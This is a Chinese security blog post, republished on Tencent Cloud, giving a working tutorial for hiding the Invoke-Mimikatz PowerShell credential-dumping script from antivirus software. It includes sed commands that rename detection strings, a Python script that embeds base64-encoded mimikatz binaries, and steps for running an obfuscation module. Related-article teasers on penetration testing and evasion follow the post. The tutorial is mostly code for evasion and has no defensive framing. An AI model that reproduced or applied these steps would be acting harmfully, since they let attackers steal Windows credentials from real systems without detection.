专栏首页鸿鹄实验室再探mimikatz免杀

再探mimikatz免杀

前几天看了tubai师傅的免杀抓密码,这里我也来分享一下mimiktaz的powershell脚本的免杀方法。

测试使用的mimikatz文件地址如下:

https://github.com/BC-SECURITY/Empire/blob/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1

首先,关于powershell脚本来说有很多现成的混淆工具(主流免杀方式就是混淆),比如chameleon、Invoke-Stealth、Chimera等等,但此类工具在混淆mimikatz时,或多或少会出现部分问题。于是我们这里手工对其进行免杀操作。

先对mimikatz的ps脚本执行基础的字符混淆

sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1

sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1

sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1

sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1

sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' Invoke-Mimikatz.ps1

sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #\-/g" Invoke-Mimikatz.ps1

弄完后一些基础的东西就算是混淆完成了,如果你想更新mimikatz,可以使用下面的py脚本进行更新

import fileinput
import base64



with open("./mimikatz_trunk/Win32/mimikatz.exe", "rb") as f:
    win32 = base64.b64encode(f.read()).decode()

with open("./mimikatz_trunk/x64/mimikatz.exe", "rb") as f:
    x64 = base64.b64encode(f.read()).decode()


for line in fileinput.FileInput("./Invoke-Mimikatz.ps1", inplace=1):

  line = line.rstrip('\r\n')
  if "$PEBytes64 = " in line:
    print("$PEBytes64 = '" + x64 + "'")
  elif "$PEBytes32 = " in line:
    print("$PEBytes32 = '" + win32 + "'")
  else:
    print(line)

此时我们的mimikatz并不能绕过杀软,我们需要利用powershell ise自带的功能来进行后续操作

先来安装该模块,命令如下:

Install-Module -Name "ISESteroids" -Scope CurrentUser -Repository PSGallery -Force

安装好以后在ise输入

 Start-Steroids

开启该模块

然后在工具中选择混淆代码

混淆即可,此时所有操作已经完成。

本文分享自微信公众号 - 鸿鹄实验室(gh_a2210090ba3f),作者:鸿鹄实验室a

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2021-08-05

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 免杀版mimikatz

    根据3好学生师傅的开源代码编译出来的,c#调用peloader,具体原理不再赘述。当然你可以发散思维一些,比如过360加用户,这里不再多说

    鸿鹄实验室
  • Mimikatz的18种免杀姿势及防御策略

    Mimikatz是法国人Benjamin Delpy编写的一款轻量级的调试工具,理论上可以抓取所有windows系统的明文密码(winxp之前的好像不行),因此...

    FB客服
  • 干货 | 源码免杀之Mimikatz

    首先在github下载mimikatz源码 https://github.com/gentilkiwi/mimikatz 使用vs2017打开工程

    HACK学习
  • 实战 | 记一次Vulnstack靶场内网渗透(三)

    在上一节《记一次Vulnstack靶场内网渗透(二)》中,我们简单的对vulnstack 4的靶场环境做了一次测试,通过外网初探、信息收集、攻入内网最终拿下域控...

    HACK学习
  • 实战中如何绕过杀软用mimikatz获取账号密码

    mimikatz的exe,powershell版(可上github下载)网上版本已经被360已及各种杀软杀的死死的,扔上去就挂

    FB客服
  • 老树开新花之分离免杀mimikatz

    之前也给大家分享过类似的免杀的mimikatz,想必现在已经被杀得没办法用了,这里介绍一种更简单的方法,利用分离免杀的方法加载mimikatz。

    鸿鹄实验室
  • 九种姿势运行Mimikatz

    *本文原创作者:R1ngk3y,本文属FreeBuf原创奖励计划,未经许可禁止转载

    FB客服
  • 内网渗透中如何离线解密 RDP 保存的密码

    在内网渗透的过程中可能会遇到目标管理员有远程登陆的记录,有些管理员会有保存密码的习惯,这个时候我们想要扩大横向范围,密码搜集是最重要的。

    渗透攻击红队
  • 记一次域渗透实战案例思路分享

    前几天帮朋友搞了一个域,很久没有搞域了感觉都快忘的差不多了,不过还好最终还是打穿了这个域,不过应朋友要求就不以文章形式来写了,简单的整理了下思路和测试过程中遇到...

    潇湘信安
  • 项目实战 | 细节决定成败的渗透测试

    个人水平有限,文章若有不足之处,感谢各位大佬批评指正,希望能够与各位师傅分享学习。

    黑白天安全
  • 项目实战 | 细节决定成败的渗透测试

    个人水平有限,文章若有不足之处,感谢各位大佬批评指正,希望能够与各位师傅分享学习。

    Gcow安全团队
  • 红蓝对抗之Windows内网渗透

    无论是渗透测试,还是红蓝对抗,目的都是暴露风险,促进提升安全水平。企业往往在外网布置重兵把守,而内网防护相对来说千疮百孔,所以渗透高手往往通过攻击员工电脑、外网...

    腾讯安全应急响应中心
  • 从WebShell到域控实战详解

    首先介绍此次渗透的环境:假设我们现在已经渗透了一台服务器PAVMSEF21,该服务器内网IP为10.51.0.21。扫描后发现内网网络结构大概如图所示,其中PA...

    用户1631416
  • 从WebShell到域控实战详解

    首先介绍此次渗透的环境:假设我们现在已经渗透了一台服务器PAVMSEF21,该服务器内网IP为10.51.0.21。扫描后发现内网网络结构大概如图所示,其中PA...

    Ms08067安全实验室
  • 获取Windows高版本明文密码

    声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。

    潇湘信安
  • Vulnstack1 - 内网部分

    Naraku
  • 实战|对学校的一次友情检测(内网环境)

    今日闲来无事,对学校内网主机进行一波友情检测,发现了存活的主机。后对端口进行探测的时候发现一台服务器。。

    用户6343818
  • 记一次对PUBG吃鸡外挂病毒的反制过程

    这事还要从一只蝙蝠开始说起~...........疫情的原因在家闲的翻箱倒柜,翻出了这么个玩意,没错这就是“压枪神器”想当初我把把落地成盒又在某宝铺天盖地的推送...

    HACK学习
  • Windows 密码抓取方式总结

    渗透测试过程中我们经常需要获取管理员的账号密码,以便进行更进一步的操作,下面我将给大家总结几种 steal account 的手法!其中可能也会涉及到 apt ...

    信安之路

扫码关注云+社区

领取腾讯云代金券